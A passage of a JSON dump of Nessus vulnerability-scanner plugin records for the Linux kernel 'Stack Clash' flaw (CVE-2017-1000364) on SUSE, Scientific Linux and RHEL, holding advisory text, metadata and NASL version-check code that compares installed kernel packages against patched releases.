>!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-base-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-base-debuginfo-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.59-92.20.2\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.59-92.20.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:17", "description": "This update for the Linux Kernel 3.12.60-52_60 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-21T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1906-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_60-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_60-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1906-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1906-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101886);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1906-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.60-52_60 fixes several issues.\nThe following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013543\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1014271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1017589\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171906-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4edddb94\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-1179=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1179=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_60-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_60-52_60-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/21\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_60-default-6-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_60-52_60-xen-6-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:45", "description": "Security Fix(es) :\n\n - A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is a kernel-side mitigation which increases the stack guard gap size from one page to 1 MiB to make successful exploitation of this issue more difficult.\n (CVE-2017-1000364, Important)", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20170619) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:kernel", "p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists", "p-cpe:/a:fermilab:scientific_linux:kernel-debug", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686", "p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:fermilab:scientific_linux:kernel-devel", "p-cpe:/a:fermilab:scientific_linux:kernel-doc", "p-cpe:/a:fermilab:scientific_linux:kernel-firmware", "p-cpe:/a:fermilab:scientific_linux:kernel-headers", "p-cpe:/a:fermilab:scientific_linux:perf", "p-cpe:/a:fermilab:scientific_linux:perf-debuginfo", "p-cpe:/a:fermilab:scientific_linux:python-perf", "p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20170619_KERNEL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/100905", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100905);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL6.x i386/x86_64 (20170619) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A flaw was found in the way memory was being allocated\n on the stack for user space binaries. If heap (or\n different memory region) and stack memory regions were\n adjacent to each other, an attacker could use this flaw\n to jump over the stack guard gap, cause controlled\n memory corruption on process stack or the adjacent\n memory region, and thus increase their privileges on the\n system. This is a kernel-side mitigation which increases\n the stack guard gap size from one page to 1 MiB to make\n successful exploitation of this issue more difficult.\n (CVE-2017-1000364, Important)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1706&L=scientific-linux-errata&F=&S=&P=3904\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?acfeeaa0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"kernel-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-abi-whitelists-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-debuginfo-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-devel-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-common-i686-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-devel-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-doc-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-firmware-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-headers-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-debuginfo-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-2.6.32-696.3.2.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-debuginfo-2.6.32-696.3.2.el6\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:46", "description": "An update for kernel is now available for Red Hat Enterprise Linux 5 Extended Lifecycle Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way memory was being allocated on the stack for user space binaries. If heap (or different memory region) and stack memory regions were adjacent to each other, an attacker could use this flaw to jump over the stack guard gap, cause controlled memory corruption on process stack or the adjacent memory region, and thus increase their privileges on the system. This is a kernel-side mitigation which increases the stack guard gap size from one page to 1 MiB to make successful exploitation of this issue more difficult.\n(CVE-2017-1000364, Important)\n\nRed Hat would like to thank Qualys Research Labs for reporting this issue.", "cvss3": {}, "published": "2017-06-22T00:00:00", "type": "nessus", "title": "RHEL 5 : kernel (RHSA-2017:1482) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-pae", "p-cpe:/a:redhat:enterprise_linux:kernel-pae-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-xen", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2017-1482.NASL", "href": "https://www.tenable.com/plugins/nessus/100979", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1482. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100979);\n script_version(\"3.14\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2017-1000364\");\n script_xref(name:\"RHSA\", value:\"2017:1482\");\n script_xref(name:\"IAVB\", value:\"2017-B-0075\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2017:1482) (Stack Clash)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 5\nExtended Lifecycle Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way memory was being allocated on the stack\nfor user space binaries. If heap (or different memory region) and\nstack memory regions were adjacent to each other, an attacker could\nuse this flaw to jump over the stack guard gap, cause controlled\nmemory corruption on process stack or the adjacent memory region, and\nthus increase their privileges on the system. This is a kernel-side\nmitigation which increases the stack guard gap size from one page to 1\nMiB to make successful exploitation of this issue more difficult.\n(CVE-2017-1000364, Important)\n\nRed Hat would like to thank Qualys Research Labs for reporting this\nissue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2017-1000364.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/stackguard\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2017-1482.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages. Note that the updated packages may not\nbe immediately available from the package repository and its mirrors.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000364\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1482\";\n yum_report = 